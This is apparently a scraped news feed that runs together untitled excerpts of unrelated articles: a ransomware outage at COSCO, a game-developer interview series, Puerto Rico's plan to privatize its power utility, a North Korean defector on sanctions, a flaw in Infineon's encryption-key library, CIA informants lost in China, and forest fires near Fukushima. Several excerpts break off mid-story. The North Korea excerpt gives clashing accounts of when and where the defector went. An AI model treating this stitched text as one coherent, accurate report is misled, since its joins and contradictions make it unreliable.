COSCO’s computer networks in the Americas remained completely severed from the Internet on Thursday, almost 48 hours after the Chinese shipping giant reported it was hit by a ransomware attack.
In a statement published Thursday, COSCO officials said the failures affected networks in the US, Canada, Panama, Argentina, Brazil, Peru, Chile, and Uruguay. The statement said people who wanted to reach COSCO employees in those countries should use special email addresses, many of which were hosted by Yahoo and Gmail. Attempts to reach COSCO’s US-based website were unsuccessful. COSCO officials said main business operation systems were performing stably and that ports in California and the UK remained open.
The statement—and posts on COSCO’s official Twitter and Facebook accounts—didn’t disclose the reason for the outage. The Press-Telegram of Long Beach, California, however, reported on Tuesday that the China state-owned shipping company was infected by ransomware. The report didn’t identify the name or strain of the ransomware, which generally encrypts computer hard drives and demands a payment by digital currency to decrypt it.

Welcome back to “War Stories,” our ongoing video series looking at game devs tackling complex programming challenges. Check out our previous chats with Looking Glass founder Paul Neurath and Ultima designer Richard Garriott.
Any fan of spacefaring turn-based strategy games should know the name Brad Wardell. For decades now, Wardell and his studio Stardock have been behind the well-loved Galactic Civilizations series, which started on the ill-fated OS/2 before finding success on Windows years later. The studio’s space-RTS empire also includes Sins of a Solar Empire and Ashes of the Singularity, keeping alive a genre that has fallen into obscurity in recent years.
Around 2010, though, Wardell and Stardock took a turn away from sci-fi and toward high fantasy with the extremely ambitious Elemental: War of Magic. As Wardell recalls, the development plan called for units that could marry and have children that really aged, fully designable cities, and individual units that could each be fully outfitted with their own sets of clothes.
]]>Puerto Rico Governor Ricardo Rossello announced Monday that the US territory will begin the privatization process of the Puerto Rico Electric Power Authority (PREPA), selling assets to companies that will “transform the generation system into a modern, efficient, and less expensive one for the people.”
“The Puerto Rico Electric Power Authority (PREPA) has become a heavy burden on our people, who are now hostage to its poor service and high cost,” Rossello said in a televised address. “What we know today as the Puerto Rico Electric Power Authority does not work and cannot continue to operate like this.”
More than four months after the island was hit by a Category 5 hurricane, power has been restored to less than 64 percent of homes and businesses, according to the latest situation report from the Department of Energy. There are still more than a half-million customers without power across the island.
PREPA has lost 30 percent of its employees over the last five years, and the energy system is 28 years older than the average electric power industry in the United States. Rossello added that the island’s dependence on oil “makes it increasingly expensive, more polluting, and less efficient.”
“The maintenance of its infrastructure was practically abandoned over the past decade,” Rossello said. “The energy system is not designed for the needs of the Puerto Rico of today.”
Now, Rossello wants the island to move toward a “consumer-centered model,” which he said should be more sustainable, viable, and attract new businesses to the island.
“If we want to facilitate the creation of new jobs and encourage investment on our Island, we have to change the obsolete energy system of the past, to one that serves as the engine of the economy, both for the reliability of those who produce energy, and for the commitment of the Government to regulate and stimulate a modern energy industry,” Rossello said.
PREPA, the largest public utilities in the United States by customers and revenue, had incurred around $ 9 billion in debt before filing for Title III bankruptcy in July. At the time, the entire island was in the midst of a historic $ 74 billion bankruptcy proceeding.
The governor said the privatization will encourage economic growth through competition in the marketplace. However, he repeatedly stated the new system would be “based on renewable and environmentally friendly sources,” in order to aid in recovery efforts after natural disasters.
“With this transformation we can achieve the goal of more than 30% of renewable energy generation. Thus, we will achieve the ability to respond faster to natural disasters. That way we can end the frequent blackouts,” Rossello said.
Tom Sanzillo, director of finance for the Ohio-based Institute for Energy Economics and Financial Analysis, told Reuters that Rossello’s plan would “produce a maximum amount of corruption and a minimal amount of electricity.”
“He’s got no energy plan, no financial analysis, if he thinks he’s going to sell it off and the private sector is going to come in and invest, that is a recipe for Puerto Rico being raked over the coals by private interests,” Sanzillo said.
Rossello laid out the sale of PREPA in a three-part plan that he said could take 18 months.
The first phase consists of drafting legislation to define the legal framework and monitoring the market. Then, the governor said they will evaluate the offers based on their technical, economic and financial evaluation. Finally, the island will negotiate with selected companies that “meet the requirements for the transformation and modernization of our energy system.”

A former North Korean government official who defected to the US says North Korea is struggling against tough sanctions — and doubts the hermit state can last a year.
“The sanctions that the White House has imposed on North Korea are of a historic level,” said Ri Jong-ho, who ran the international network of North Korean businesses that funnels hard currency to Pyongyang before leaving North Korea for the US last year.
“Never before has the country faced such tough sanctions. I don’t know if North Korea will survive a year with these sanctions. People will die.”
North Korea’s provocative behaviour is a result of Pyongyang’s “desperate” need to force a diplomatic opening with the US, Ri told an Asia Society event in New York, adding that one of the government’s priorities is to sever Washington’s ties with South Korea.
“Right now the leadership of North Korea have deployed missiles aimed at the US and are doing these provocations, but they desperately want relations with the US,” he said.
“The North Korean leader wants to stay in power for a long time. He believes he must have friendly relations with the US to do that. They didn’t want South Korea involved in the talks.
“They just wanted two-way talks. What the North Korean leadership wants is to know how to warm relations with the US.”
“One can interpret recent actions and declarations regarding North Korea’s nuclear and missile testing in two ways.
“It should either be taken at face value or seen as an effort to extract maximum concessions should there be arms control negotiations in the future,” Paul Stares, a senior fellow for conflict prevention and director of the Centre for Preventive Action at the New York-based Council on Foreign Relations, told the South China Morning Post.
“What should be clear by now, however, it that any such negotiation would be about the size of the North Korean nuclear arsenal, not its existence. They are not going to give it up. Period.”

Ri also said North Korea’s relations with China had soured because of Kim Jong-un’s purge of his uncle Jang Song-thaek and other officials close to Beijing.
Kim’s hatred of Beijing intensified after China’s President Xi Jinping visited Seoul before Pyongyang on his first trip to the Korean peninsula.
Xi’s decision was prompted by the deaths of “thousands” allied with Jang and, by extension, China, Ri said.
Kim Jong-un took Xi’s decision as an insult and in July 2014 convened a meeting of high-ranking officials where the North Korean leader “called president Xi a ‘son of a bitch’ and called the Chinese people ‘sons of bitches’”, Ri said.
“Now China has blocked trade, which has never happened before, so this is the very worst point of their relationship.”
Ri’s comments were in stark contrast to the scepticism he had previously cast on United Nations sanctions meant to stop North Korea’s nuclear weapons programme. Since defecting last year, Risaid that Pyongyang had managed to circumvent most of the restrictions – often with help from Chinese entities.

“I can see the North Korean economy like it’s in the palm of my hands,” Ri said.
“[North Korea] has to buy the raw materials in order for them to produce [their weapons] and they have to export products [to support this programme]. They are in a very difficult position, so they need to resolve that.”
While in Dalian, Ri served as head of the Korea Daehung Trading Corporation, which is managed by Office 39, a clandestine organisation under direct control of Kim’s family.
Office 39 is responsible for procuring for the Kim government hard currency that is critical to support the economy and ensure the loyalty of party elites.
In July, Ri told The Washington Post that he oversaw the implementation of tactics North Korea used to bypass UN sanctions. Some of the circumvention methods included having China-stationed North Korean officials like Ri hand-deliver bags filled with millions of US dollars in cash to captains of North Korean vessels heading back to home ports from China, Ri told the newspaper. Another tactic was changing the names of companies targeted by UN sanctions, Ri said.
UN sanctions have been piling up on North Korea since 2006, after six-nation talks involving North Korea, China, the US, Japan, South Korea and Russia broke down. The most recent sanctions, passed in August and September, effectively cut all trade with North Korea except for humanitarian deliveries and limited quantities of oil.
Prompted by North Korea’s most recent nuclear detonation, on September 3, the UN Security Council unanimously passed less than a week later the latest resolution put forward by the US.
That resolution aims to cut North Korea’s imports of refined petroleum products by 55 per cent and ban the supply of natural gas and natural gas derivatives to ensure they aren’t used as substitutes.

Moreover, banning North Korea’s textile exports and remittances by overseas North Korean workers to Pyongyang, the resolution would cut US$ 1.3 billion in revenues annually.
The US agreed to allow some oil shipments to keep flowing to North Korea to secure China’s approval.
Previous UN sanctions on North Korea stopped short of controls on oil and fuel, also at China’s behest, owing to concerns that such moves might destabilise the country and leave Beijing with a refugee problem. China shares a 1,400km border with North Korea along the Yalu River.
Ri defected in 2014 from his last posting, in the northeastern Chinese port city of Dalian, travelling with his family to South Korea.
A North Korean official reaffirmed Pyongyang’s commitment to developing a long-range intercontinental ballistic missile capable of reaching “all the way to the east coast of the mainland US,” on Monday, telling CNN that the rogue nation was currently not interested in diplomacy with the US until it achieved that goal.

A crippling flaw in a widely used code library has fatally undermined the security of millions of encryption keys used in some of the highest-stakes settings, including national identity cards, software- and application-signing, and trusted platform modules protecting government and corporate computers.
The weakness allows attackers to calculate the private portion of any vulnerable key using nothing more than the corresponding public portion. Hackers can then use the private key to impersonate key owners, decrypt sensitive data, sneak malicious code into digitally signed software, and bypass protections that prevent accessing or tampering with stolen PCs. The five-year-old flaw is also troubling because it’s located in code that complies with two internationally recognized security certification standards that are binding on many governments, contractors, and companies around the world. The code library was developed by German chipmaker Infineon and has been generating weak keys since 2012 at the latest.
The flaw is the one Estonia’s government obliquely referred to last month when it warned that 750,000 digital IDs issued since 2014 were vulnerable to attack. Estonian officials said they were closing the ID card public key database to prevent abuse. Last week, Microsoft, Google, and Infineon all warned how the weakness can impair the protections built into TPM products that ironically enough are designed to give an additional measure of security to high-target individuals and organizations.

WASHINGTON (Reuters) – China killed or imprisoned 18 to 20 CIA sources from 2010 to 2012, hobbling U.S. spying operations in a massive intelligence breach whose origin has not been identified, the New York Times reported on Saturday.
Investigators remain divided over whether there was a spy within the Central Intelligence Agency who betrayed the sources or whether the Chinese hacked the CIA’s covert communications system, the newspaper reported, citing current and former U.S. officials.
The Chinese killed at least a dozen people providing information to the CIA from 2010 through 2012, dismantling a network that was years in the making, the newspaper reported.
One was shot and killed in front of a government building in China, three officials told the Times, saying that was designed as a message to others about working with Washington.
The breach was considered particularly damaging, with the number of assets lost rivaling those in the Soviet Union and Russia who perished after information passed to Moscow by spies Aldrich Ames and Robert Hanssen, the report said. Ames was active as a spy in the 1980s and Hanssen from 1979 to 2001.
The CIA declined to comment when asked about the Times report on Saturday.
The Chinese activities began to emerge in 2010, when the American spy agency had been getting high quality information about the Chinese government from sources deep inside the bureaucracy, including Chinese upset by the Beijing government’s corruption, four former officials told the Times.
The information began to dry up by the end of the year and the sources began disappearing in early 2011, the report said.
As more sources were killed the FBI and the CIA began a joint investigation of the breach, examining all operations run in Beijing and every employee of the U.S. Embassy there.
The investigation ultimately centered on a former CIA operative who worked in a division overseeing China, the newspaper said, but there was not enough evidence to arrest him.
Some investigators believed the Chinese had hacked the CIA’s covert communications system.
Still others thought the breach was a result of careless spy work including traveling the same routes to the same meeting points or meeting sources at restaurants where Chinese had planted listening devices, the newspaper said.
By 2013, U.S. intelligence concluded China’s ability to identify its agents had been curtailed, the newspaper said, and the CIA has been trying to rebuild its spy network there.

Fukushima prefecture has asked the Japanese Self-Defense Forces for help in handling forest fires that have swept areas near the crippled Fukushima power plant, local media report. Strong winds are hindering the firefighting efforts, however.
The forest fires broke out near the town of Namie, some seven kilometers from the disabled Fukushima Daiichi Nuclear Power Plant, on Saturday evening, Japanese NHK broadcaster reported.
Namie was evacuated following the 2011 tsunami and subsequent nuclear disaster in Fukushima.

The prefecture has deployed several helicopters to extinguish the fires, which are believed to have been caused by lightning. According to police, at least 10 hectares of forest have burned in the area.
There have been no reports of injuries or damage to buildings so far, Japanese media say.
With strong winds stoking the flames, the Fukushima Prefecture has requested help from the Self-Defense Forces, Japan’s de-facto army, on Sunday.
Earlier in April, residents of Namie, as well as those from the village of Iitate and the town of Kawamata’s Yamakiya neighborhood, totaling 22,100 people in all, were told they could return home – with the exception of those with houses in so-called no-go zones, where radiation levels are still too high, according to Japanese media.
So far, the homecoming has not been as successful as the government had hoped, as few residents have been eager to go back.
Results of a Fukushima Prefectural Government survey released on April 24 show that some 78.2 percent of the evacuated households have no intention of returning to their previous residences and plan to remain in the area they evacuated to.
